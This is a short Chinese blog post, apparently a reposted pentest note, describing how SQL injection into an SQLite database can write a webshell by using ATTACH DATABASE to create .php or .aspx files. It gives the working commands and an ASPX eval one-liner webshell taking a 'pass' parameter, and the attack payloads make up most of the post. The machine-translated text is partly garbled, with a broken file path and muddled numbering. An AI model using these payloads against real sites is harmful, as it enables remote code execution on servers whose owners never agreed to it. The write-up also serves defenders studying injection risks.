• SQLite扫描


    SQLite的扫盲

    1. SQLite的是一种嵌入式数据库,它的数据库就是一个文件。由于SQLite的本身是Ç写的,而且体积很小,所以经常被集成到各种应用程序中,主要在手机的应用中使用。

    2. 之前没有遇到过关于SQLite的的注入,这次遇到一个在ASPX中使用的SQLite数据库,并且存在注入。

    3. SQLite的一个重要的特性是零配置的,这意味着不需要复杂的安装或管理。

    4. SQLite的的语法和其他数据库差不多,只不过的SQLite的数据库是一个单独的文件.SQLite创建数据库的方法有两种,一种是创建,另外一种是附加。

    5. 创建使用命令:sqlite3.exe 数据库文件名。例如创建一个名字为aa.db的数据库,使用命令:sqlite3.exe aa.db。

    6. 例如附加一个bb.db的数据库,别名为a,命令为:attach database 'd:sqliteb.db' as 'a';。

    7. 创建表并插入数据的命令如下:

       create table a.tt(dataz text); INSERT into a.tt(dataz) VALUES ('test');
      
    8. SQLite还可以生成任意后缀名的数据库文件。例如创建一个php结尾的数据库文件,新建一个名为exp的表,并在其中插入数据,内容为:<?php phpinfo();?>

    具体命令:

    ```sqlite>ATTACH DATABASE 'd:\sqlite\23.php' AS test ;create TABLE test.exp (dataz text) ; insert INTO test.exp (dataz) VALUES ('<?php phpinfo();?>');--
    
    
    9. 同样的方法生成aspx后缀的数据库文件,创建表,并插入<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>。然后将该文件放在IIS服务的web目录。发现其中的APSX代码也会被解析。
    10. 通过以上的测试过程和实际利用,可以归纳两点:
    
    11. SQLite可以创建任意格式的数据库文件,并且插入的代码可以根据文件格式来解析,这就造成了可以利用这种方式写WEBSHELL的原因。
    2.SQLite中十六进制的写法为:x'....',而不是0x....。
    
    参考:```https://fuping.site/2017/07/19/SQLite-Injection-Get-WebShell/```
  • 相关阅读:
    初级程序员面试不靠谱指南(三)
    [细节决定B度]之回首一瞥cout<<"Hello,world"<<endl;
    20110310日记wmh
    SliverLight 控件属性的赋值方式
    20110309wmh日记
    20110308wmh日记
    20110307wmh日记
    STOAdiary20110314完成的任务
    20110313wmh日记
    20110311wmh日记
  • 原文地址:https://www.cnblogs.com/NBeveryday/p/11309895.html
Copyright © 2020-2023  润新知